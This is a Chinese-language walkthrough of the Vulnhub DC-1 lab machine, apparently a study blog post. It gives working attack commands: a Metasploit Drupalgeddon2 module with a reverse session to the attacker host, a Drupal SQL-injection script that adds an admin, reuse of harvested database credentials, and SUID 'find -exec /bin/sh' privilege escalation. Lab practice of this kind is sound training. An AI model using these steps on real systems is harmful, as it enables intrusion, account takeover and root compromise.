Vulnhub-DC-1渗透学习

一、环境搭建

攻击机:Kali-2021.3:192.168.8.105

靶机:Vulnhub-DC1:192.168.8.230

靶机下载地址:Https://download.vulnhub.com/dc/DC-1.zip

二、信息收集

启动靶机,由于我们没法进去这个靶机,所以IP地址是未知的

Vulnhub-DC-1渗透学习_第1张图片

用ifconfig查看kali的IP地址

Vulnhub-DC-1渗透学习_第2张图片

使用nmap对该网段下的主机进行主机探活

nmap -sP 192.168.8.0/24
/24的意思是告诉nmap扫描192.168.8.0这一个网段,相当于192.168.8.0-255

Vulnhub-DC-1渗透学习_第3张图片

一共发现了4个主机存活,最后一个是本机IP,因此可以不用考虑

使用下面命令进行逐个扫描,根据它们所开放的端口等其他信息进行排查

nmap超详细使用教程

nmap -A 192.168.8.230
或
nmap -A -p- 192.168.8.230
Vulnhub-DC-1渗透学习_第4张图片

可以看到开放了80端口,打开浏览器进行访问

Vulnhub-DC-1渗透学习_第5张图片

观察这个页面可以发现是Drupal框架,那么就可能存在这个框架所对应的漏洞

如果看不出来的话,在kali上也可以利用whatweb来查看这个网站的各种信息

Vulnhub-DC-1渗透学习_第6张图片

可以看到这是个Drupal 7.X的框架,浏览器查找可以看到有对应的漏洞

Vulnhub-DC-1渗透学习_第7张图片

或者在msf里也可以找到可以利用的payload

msf全称Metasploit Framework,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode

使用msfconsole即可进入msf

检索这个框架的漏洞:

search drupal

Vulnhub-DC-1渗透学习_第8张图片

三、实战

经过我的测试发现第二个EXP还可以使用,而且能达到我们的目的

use exploit/unix/webapp/drupal_drupalgeddon2 //使用该EXP模块
show options //查看需要设置的参数
set RHOSTS 192.168.8.230 //设置被攻击的IP
set LHOST 192.168.8.105 //设置监听IP,即本机IP

通过查看options确认配置好参数以后,使用run即可,攻击成功后msf会返回一个session

Vulnhub-DC-1渗透学习_第9张图片

我们可以利用这个session来查看各种信息,比如:

 getuid //查看当前用户
 sysinfo //查看当前系统版本

Vulnhub-DC-1渗透学习_第10张图片

flag1

通过刚刚的session,使用shell获得系统的一个非交互式shell

深入浅出理解交互式shell和非交互式shell、登录shell和非登录shell的区别

交互式shell就是在终端上执行,shell等待你的输入,并且立即执行你提交的命令。这种模式被称作交互式是因为shell与用户进行交互。这种模式也是大多数用户非常熟悉的:登录、执行一些命令、退出。当你退出后,shell也终止了。

非交互式shell,以shell script(非交互)方式执行。在这种模式 下,shell不与你进行交互,而是读取存放在文件中的命令,并且执行它们。当它读到文件的结尾EOF,shell也就终止了。

因此为了方便我们之后的操作,我们需要利用python来把它转换成交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'
Vulnhub-DC-1渗透学习_第11张图片

然后就能很快发现第一个flag

Vulnhub-DC-1渗透学习_第12张图片

flag2

flag1中的内容提示我们要找CMS(即Drupal)的配置文件,浏览器检索就能看到配置文件的位置

Vulnhub-DC-1渗透学习_第13张图片

打开这个配置文件就可以发现第二个flag

Vulnhub-DC-1渗透学习_第14张图片

同时也发现了数据库的相关信息

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
              
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),/
  ),
 );

flag3

flag2中也有提示,提示我们不需要暴力破解,而是得到访问权限

Vulnhub-DC-1渗透学习_第15张图片

由上面得到的数据库信息我们可以进入数据库中

 mysql -u dbuser -p R0ck3t

Vulnhub-DC-1渗透学习_第16张图片

对数据库进行常规操作

show databases;
use drupaldb;
show tables;
select * from users;
Vulnhub-DC-1渗透学习_第17张图片
Vulnhub-DC-1渗透学习_第18张图片

可以看到这里有管理员的账号和密码,但很明显,这里的密码经过了加密,无法直接使用,这里有两种方法可以得到管理员权限

方法1-重置管理员密码

网上也有相关的文章,因为我们已经登录了数据库,自然可以对数据库里的数据进行修改

如何重置Drupal 7的用户密码

在Drupal的安装目录中的scripts目录下,有一些Drupal开发者准备好的PHP脚本,其中里面有个password-hash.sh文件,该文件的功能就是接收一个密码(字符串),然后返回加密后的字符串

find / -name "password-hash.sh" //找到该文件的位置
php /var/www/scripts/password-hash.sh 123456 //传入的密码为123456
Vulnhub-DC-1渗透学习_第19张图片

然后只需要把这个新密码更新到用户admin中就可以实现重置密码,在数据库中使用下面的命令

use drupaldb;
update users set pass='$S$DKalQTXxpfdOP0QHC.bi8HxVb.AKt/bwbr0KUMQx6hiLPgZE/aYl' where name='admin';

此时我们就可以登录后台了

Vulnhub-DC-1渗透学习_第20张图片

在content里就能发现flag3

Vulnhub-DC-1渗透学习_第21张图片

Vulnhub-DC-1渗透学习_第22张图片

方法2-添加具有管理员权限的用户

首先我们得确定该Drupal的版本信息

cat /var/www/includes/bootstrap.inc | grep VERSION

然后利用kali自带的SearchSploit工具进行搜索

searchsploit drupal

Vulnhub-DC-1渗透学习_第23张图片

发现有个SQL注入的漏洞,可以添加管理员用户

然后只需要使用python去执行这个py文件就可以实现添加管理员了

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.8.230 -u aadmin -p 123456

出现下面的画面就代表我们已经添加成功了

Vulnhub-DC-1渗透学习_第24张图片

查看一下数据库,发现成功在数据库中添加了管理员

Vulnhub-DC-1渗透学习_第25张图片

之后再通过登录网站后台,就可以找到第三个flag了

flag4

flag3中有提示关键词permsfindpasswd-exec

因此查看passwd文件就可以找到flag4

cat /etc/passwd

Vulnhub-DC-1渗透学习_第26张图片

这里还有一种方法,也就是使用find命令来查找

find / -name "flag*.txt"

这样也可以找到flag4

flag5

flag4中说最后一个flag在root里,但在访问root的时候发现权限不够

Vulnhub-DC-1渗透学习_第27张图片

因此我们需要把权限提升至root,再根据flag3里的perms和-exec,猜测可能会用到SUID提权

SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义。

简单来说就是非root用户在调用一个设置有SUID权限的可执行文件时,该进程的权限将为root权限

那么如何知道什么可执行文件具有SUID权限呢,有以下几种

find / -perm -4000 //最简单的一种
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

简单解释一下一些参数的意思

-u=s 表示查找root用户拥有的文件
-type f 表示我们寻找的文件类型是常规文件
2 表示该进程的第二个文件描述符,即stderr(标准错误)
> 表示重定向
/dev/null 是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。

find基础命令与提权教程

可以看到find命令有SUID权限,因此我们可以用find进行提权

Vulnhub-DC-1渗透学习_第28张图片

常见的可以用来提权的程序有:nmap、vim、find、bash、more、less、nano、cp

find提权

find robots.txt -exec "/bin/sh" \;

中间的robots.txt是一个能够找到的文件或者目录,否则可能会出错,执行了这个命令之后就可以看到权限提升到了root

然后再进入root目录就能看到最后一个flag的位置了

Vulnhub-DC-1渗透学习_第29张图片

参考文章

【Vulnhub-DC1】DC-1

dc-1 靶机渗透学习

find基础命令与提权教程

如何重置Drupal 7的用户密码

深入浅出理解交互式shell和非交互式shell、登录shell和非登录shell的区别

nmap超详细使用教程

你可能感兴趣的:(渗透测试,靶机,安全,linux,运维,web安全)